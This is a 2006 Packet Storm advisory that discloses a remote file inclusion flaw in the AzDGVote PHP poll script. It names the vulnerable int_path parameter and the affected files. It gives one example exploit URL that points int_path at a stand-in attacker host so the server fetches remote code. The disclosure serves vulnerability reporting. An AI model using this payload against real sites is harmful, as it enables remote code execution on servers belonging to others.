AzDGVote.txt

2006-04-12T00:00:00
ID PACKETSTORM:45411
Type packetstorm
Reporter lezr.com
Modified 2006-04-12T00:00:00

Description

                                        
                                            `AzDGVote File inclusion  
---------------------------------  
Site:http://www.azdg.com/  
Demo:http://www.azdg.com/scripts/AzDGVote/vote.php?id=1  
  
---------------------------------------  
File inclusion  
  
  
include $int_path."/AzDG.template.inc.php";  
  
  
int_path parameter File inclusion  
  
Aut File  
  
vote.php,view.php,admin.php  
and /admin/index.php  
  
  
---------------------------------------  
example  
  
  
http://victim.com/poll/view.php?int_path=http://evilsite  
  
  
-----------------------------------------  
Discovered By SnIpEr_SA  
E-mail:selfar2002@hotmail.com,SnIpEr_SA@bsdmail.org  
Site: www.3asfh.com www.lezr.com  
`